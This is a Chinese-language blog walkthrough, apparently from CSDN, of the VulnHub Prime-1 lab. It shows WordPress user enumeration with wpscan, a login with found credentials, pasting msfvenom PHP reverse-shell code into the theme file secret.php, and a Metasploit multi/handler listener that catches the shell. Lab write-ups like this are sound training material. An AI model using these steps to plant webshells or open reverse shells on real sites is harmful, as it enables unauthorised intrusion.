前言
本次实战通过prime靶场进行操作,从寻找测试点和getshell,对各项步骤进行详细记录,以方便参考
接上一篇文章https://blog.csdn.net/qq_66136699/article/details/155752517?fromshare=blogdetail&sharetype=blogdetail&sharerId=155752517&sharerefer=PC&sharesource=qq_66136699&sharefrom=from_link
目录
一、反弹连接是什么?
二、使用步骤
1.准备工作
2.实战操作
①登录网站
②指纹识别
③尝试登录编辑
④寻找上传点
⑥构建shell代码
⑦创建监听通道
⑧反弹shell
总结
一、反弹连接是什么?
简单来说就是黑客控制了目标,并建立了监听的端口,以及构建了一个可以访问的后门,这里的反弹连接是在通过在后台服务端上传木马,当客户端访问带有木马的页面时,攻击机通过监听的端口获取到了系统的shell,获得了执行命令的权限
二、使用步骤
1.准备工作
使用靶场:vulnhub-prime-1
攻击机版本:kali2025.03、
在前面的信息收集环节我们获取到了靶场 wordpress 的账号和密码
url:http://192.168.12.134/wordpress/
密码:follow_the_ippsec
2.实战操作
①登录网站
访问 wordpress 后台的url,并找到 login in 关键词
点击进去发现是一个登录页面
②指纹识别
回到 kali 攻击机对网站做一个指纹识别
wpscan --url http://192.168.12.134/wordpress/ --enumerate u
参数说明:--url 指定识别的网站地址,-enumerate u: 枚举用户名
结果显示发现了一个已注册的用户名
目前掌握的重要信息
账户:victor
密码:follow_the_ippsec
③尝试登录![]()
登录成功!!
④寻找上传点
wordpress有一个功能,可以在系统内部编辑代码,思路是找到其中可以编辑的代码框,并上传带有反弹shell木马的代码,位置以标出
我找到的可编辑文件是 secret.php,
⑥构建shell代码
回到kali,利用 msfvenom构建php反弹连接的代码
输入这一串指令,我的 kali ip地址为:192.168.12.128
构建成功后cat查看代码并复制,开头的 / *就不用了复制了
粘贴到 wordpress 中 secret.php,并上传更新
⑦创建监听通道
回到kali,需要设置一些参数来建立监听连接
msfconsole
使用 msf 控制终端
输入以下参数,确保与 msfvenom 构建的反弹shell的文件参数一致
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.12.128
set lport 7777
⑧反弹shell
exploit 开始监听端口,并等待反弹shell
根据wordpress的项目目录结构,可以确定 secret.php 文件在下面这个位置
为方便学习最好自己搞一套wordpress的源码研究
回车!!再回到 kali 反弹连接 shell 成功。
可以再上面输入一些简单命令,也就是说初步获取到了靶机执行命令权限
总结
本文简单介绍了反弹shell进行连接的使用,使用了msf工具构建了带有木马的shell代码,经过一层层得到信息收集和测试,最终获取到了服务端shell执行命令的权限。